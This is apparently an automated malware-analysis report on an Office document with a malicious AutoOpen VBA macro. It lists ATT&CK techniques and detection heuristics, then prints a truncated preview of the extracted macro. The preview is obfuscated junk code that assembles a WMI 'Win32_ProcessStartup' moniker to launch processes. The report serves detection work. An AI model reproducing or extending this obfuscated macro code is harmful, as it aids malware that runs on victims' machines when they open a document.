MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The macro utilizes GetObject and CreateObject to interact with WMI's Win32_Process, indicating an intent to launch an external process. This is a common technique for downloading and executing further malicious payloads. The presence of an AutoOpen macro further suggests automatic execution upon opening.
Heuristics (8)
- ClamAV: Doc.Malware.Dpzn-6865673-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Dpzn-6865673-0
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical) OLE_VBA_WMI_PROCESS_CREATE: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59207 bytes |

SHA-256 of macros.bas: 808abd70df5a2d2cc6bbdc8dba18a1994ffa71d6fa7895369c1befa34ef4e105

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "w_87_0_8"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "E960__63"
Function u7_5_927()
Select Case j07206__
Case 975216751
D81482_ = Log(v5686254)
Q706125_ = CDate(446989759)
R11067 = Fix(635876912 + 854830414 + j27_54__ - Oct(597285366))
h1_263_ = Cos(175701281 - Sqr(186174107 - Atn(322986415)) - 372282598 + 458561127)
End Select
Select Case w2_20423
Case 643565131
F9_3__ = Log(n_32_5)
m4_488_7 = CDate(64065962)
t_5_3_76 = Fix(917251719 + 356412451 + u4471_1 - Oct(165890029))
Z5__398_ = Cos(402701496 - Sqr(139121659 - Atn(296917423)) - 974108805 + 444159491)
End Select
Select Case G4_4_07
Case 477866322
Y3__45_2 = Log(w1__0757)
m969____ = CDate(462911845)
b___777 = Fix(519126395 + 966973158 + p3725398 - Oct(390929165))
c2__22 = Cos(426342374 - Sqr(496619113 - Atn(137654344)) - 671226216 + 819692882)
End Select
Select Case K8_5_4__
Case 428023403
C3820_7 = Log(i56889_)
f140_66 = CDate(581924392)
m23_78 = Fix(76452604 + 920176803 + i43866_ - Oct(97920145))
M7_5__56 = Cos(219720391 - Sqr(155325006 - Atn(660415928)) - 77729273 + 458107732)
End Select
Select Case J887__
Case 582949130
V2_47069 = Log(t0_3713)
R5_111_ = CDate(907427881)
Q__342 = Fix(809444727 + 591856692 + S5298_9 - Oct(427554554))
Y94288 = Cos(439947078 - Sqr(113179380 - Atn(719920942)) - 217229393 + 490626696)
End Select
Select Case A__1_2
Case 258010107
j6357_3 = Log(C722_6_)
K0_2_993 = CDate(504326168)
c_054_ = Fix(567317348 + 931962928 + s___23 - Oct(218245170))
Z4_615 = Cos(594432519 - Sqr(593301028 - Atn(666350328)) - 584348566 + 739162024)
End Select
Select Case Z75___
Case 130046545
Z16302 = Log(N64_5798)
f70_83 = CDate(100528990)
r089_961 = Fix(972481152 + 251598096 + c340__23 - Oct(3293372))
F_8488 = Cos(452878507 - Sqr(226932724 - Atn(88722026)) - 188527265 + 187069840)
End Select
End Function
Function q__1287_(L65__396, q_2___2)
On Error Resume Next
Select Case i__8__
Case 475856830
H26_91_ = Log(l_38_8_)
X9__01 = CDate(98084144)
h134924 = Fix(619110488 + 538984467 + w_38__7 - Oct(977279984))
W_2012 = Cos(722210165 - Sqr(376323707 - Atn(426060720)) - 371781237 + 618616982)
End Select
Select Case C_04_68
Case 652085704
Z3699_10 = Log(W99_78)
m_802_73 = CDate(507806577)
q9_694 = Fix(270671216 + 739858407 + t6400_ - Oct(473375770))
p53__53_ = Cos(61477646 - Sqr(444705859 - Atn(132925130)) - 445981725 + 483467435)
End Select
Select Case b0_2182
Case 412858554
h8_366 = Log(w7_16_)
Q09_896 = CDate(177102161)
u47_57_ = Fix(163262357 + 651083909 + u0_0_6 - Oct(738859350))
R_2936_ = Cos(833127237 - Sqr(519588308 - Atn(51165207)) - 128472470 + 663790913)
End Select
B_96910 = L47614 + "winmgmts:Win32" + "_ProcessStartup" + j74875
Select Case L_3_464
Case 95387040
v8_5_4 = Log(P93_248)
G526_2 = CDate(288282167)
w50_8__ = Fix(523667146 + 956761767 + P7__94 - Oct(842166200))
o_4343_ = Cos(175902975 - Sqr(809985513 - Atn(144350844)) - 391552779 + 639754283)
End Select
Select Case h3_474
Case 916853637
S_73088 = Log(s083766_)
u8_03_ = CDate(741879786)
X_9_351 = Fix(346886232 + 152885670 + z1014_9 - Oct(492362795))
q8____ = Cos(63
```
... (truncated)